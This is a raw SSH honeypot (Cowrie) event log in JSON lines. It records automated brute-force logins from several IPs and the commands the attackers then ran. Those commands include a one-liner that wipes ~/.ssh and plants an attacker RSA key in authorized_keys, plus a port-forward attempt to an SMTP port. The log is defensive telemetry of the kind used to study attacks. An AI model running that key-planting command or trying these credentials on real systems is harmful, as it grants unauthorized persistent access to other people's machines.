{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:38:45.705173Z","src_ip":"197.248.104.19","session":"3e550515d920"}
{"eventid":"cowrie.session.connect","src_ip":"197.248.104.19","src_port":45380,"dst_ip":"1.2.3.4","dst_port":22,"session":"88a6c27ea6a7","protocol":"ssh","message":"New connection: 197.248.104.19:45380 (1.2.3.4:22) [session: 88a6c27ea6a7]","sensor":"my-vps","timestamp":"2025-08-28T07:38:45.838852Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:38:45.839872Z","src_ip":"197.248.104.19","session":"88a6c27ea6a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:38:45.989738Z","src_ip":"197.248.104.19","session":"88a6c27ea6a7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T07:38:46.629908Z","src_ip":"197.248.104.19","session":"88a6c27ea6a7"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:38:47.783240Z","src_ip":"197.248.104.19","session":"88a6c27ea6a7"}
{"eventid":"cowrie.session.connect","src_ip":"197.248.104.19","src_port":45390,"dst_ip":"1.2.3.4","dst_port":22,"session":"bca41082b78e","protocol":"ssh","message":"New connection: 197.248.104.19:45390 (1.2.3.4:22) [session: bca41082b78e]","sensor":"my-vps","timestamp":"2025-08-28T07:38:47.960017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:38:47.961030Z","src_ip":"197.248.104.19","session":"bca41082b78e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:38:48.124974Z","src_ip":"197.248.104.19","session":"bca41082b78e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:38:48.821616Z","src_ip":"197.248.104.19","session":"bca41082b78e"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:38:48.987357Z","src_ip":"197.248.104.19","session":"bca41082b78e"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:38:48.988280Z","src_ip":"197.248.104.19","session":"3e550515d920"}
{"eventid":"cowrie.session.connect","src_ip":"197.44.15.210","src_port":59120,"dst_ip":"1.2.3.4","dst_port":22,"session":"9922b8d36f62","protocol":"ssh","message":"New connection: 197.44.15.210:59120 (1.2.3.4:22) [session: 9922b8d36f62]","sensor":"my-vps","timestamp":"2025-08-28T07:38:55.342927Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:38:55.345444Z","src_ip":"197.44.15.210","session":"9922b8d36f62"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:38:55.411466Z","src_ip":"197.44.15.210","session":"9922b8d36f62"}
{"eventid":"cowrie.login.success","username":"root","password":"Gs123456","message":"login attempt [root/Gs123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:38:55.675067Z","src_ip":"197.44.15.210","session":"9922b8d36f62"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:38:55.831017Z","src_ip":"197.44.15.210","session":"9922b8d36f62"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:38:55.831847Z","src_ip":"197.44.15.210","session":"9922b8d36f62"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:38:55.832829Z","src_ip":"197.44.15.210","session":"9922b8d36f62"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:38:55.900542Z","src_ip":"197.44.15.210","session":"9922b8d36f62"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:38:56.169911Z","src_ip":"197.44.15.210","session":"9922b8d36f62"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T07:38:56.170629Z","src_ip":"197.44.15.210","session":"9922b8d36f62"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T07:38:56.238296Z","src_ip":"197.44.15.210","session":"9922b8d36f62"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:38:56.239200Z","src_ip":"197.44.15.210","session":"9922b8d36f62"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54553,"dst_ip":"1.2.3.4","dst_port":22,"session":"3dce2cc7603d","protocol":"ssh","message":"New connection: 212.227.125.160:54553 (1.2.3.4:22) [session: 3dce2cc7603d]","sensor":"my-vps","timestamp":"2025-08-28T07:38:56.274487Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T07:38:56.275420Z","src_ip":"212.227.125.160","session":"3dce2cc7603d"}
{"eventid":"cowrie.session.connect","src_ip":"197.44.15.210","src_port":59362,"dst_ip":"1.2.3.4","dst_port":22,"session":"9086509f628b","protocol":"ssh","message":"New connection: 197.44.15.210:59362 (1.2.3.4:22) [session: 9086509f628b]","sensor":"my-vps","timestamp":"2025-08-28T07:38:56.310066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:38:56.310765Z","src_ip":"197.44.15.210","session":"9086509f628b"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T07:38:56.355419Z","src_ip":"212.227.125.160","session":"3dce2cc7603d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:38:56.384587Z","src_ip":"197.44.15.210","session":"9086509f628b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T07:38:56.717922Z","src_ip":"197.44.15.210","session":"9086509f628b"}
{"eventid":"cowrie.login.success","username":"root","password":"gay","message":"login attempt [root/gay] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:38:56.720352Z","src_ip":"212.227.125.160","session":"3dce2cc7603d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.125.160","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-28T07:38:56.804292Z","session":"3dce2cc7603d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-28T07:38:56.885945Z","src_ip":"212.227.125.160","session":"3dce2cc7603d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:38:56.968232Z","src_ip":"212.227.125.160","session":"3dce2cc7603d"}
{"eventid":"cowrie.session.connect","src_ip":"210.79.190.151","src_port":54360,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f7a817075eb","protocol":"ssh","message":"New connection: 210.79.190.151:54360 (1.2.3.4:22) [session: 8f7a817075eb]","sensor":"my-vps","timestamp":"2025-08-28T07:38:57.363195Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:38:57.363991Z","src_ip":"210.79.190.151","session":"8f7a817075eb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:38:57.639490Z","src_ip":"210.79.190.151","session":"8f7a817075eb"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:38:57.791907Z","src_ip":"197.44.15.210","session":"9086509f628b"}
{"eventid":"cowrie.session.connect","src_ip":"197.44.15.210","src_port":59712,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1a4d551c4c6","protocol":"ssh","message":"New connection: 197.44.15.210:59712 (1.2.3.4:22) [session: d1a4d551c4c6]","sensor":"my-vps","timestamp":"2025-08-28T07:38:57.856602Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:38:57.858391Z","src_ip":"197.44.15.210","session":"d1a4d551c4c6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:38:57.927521Z","src_ip":"197.44.15.210","session":"d1a4d551c4c6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:38:58.193404Z","src_ip":"197.44.15.210","session":"d1a4d551c4c6"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:38:58.263260Z","src_ip":"197.44.15.210","session":"9922b8d36f62"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:38:58.264265Z","src_ip":"197.44.15.210","session":"d1a4d551c4c6"}
{"eventid":"cowrie.login.success","username":"root","password":"welcome@123","message":"login attempt [root/welcome@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:38:58.782607Z","src_ip":"210.79.190.151","session":"8f7a817075eb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:38:59.352621Z","src_ip":"210.79.190.151","session":"8f7a817075eb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:38:59.353368Z","src_ip":"210.79.190.151","session":"8f7a817075eb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:38:59.354488Z","src_ip":"210.79.190.151","session":"8f7a817075eb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:38:59.631106Z","src_ip":"210.79.190.151","session":"8f7a817075eb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:00.315578Z","src_ip":"210.79.190.151","session":"8f7a817075eb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T07:39:00.316266Z","src_ip":"210.79.190.151","session":"8f7a817075eb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T07:39:00.593345Z","src_ip":"210.79.190.151","session":"8f7a817075eb"}
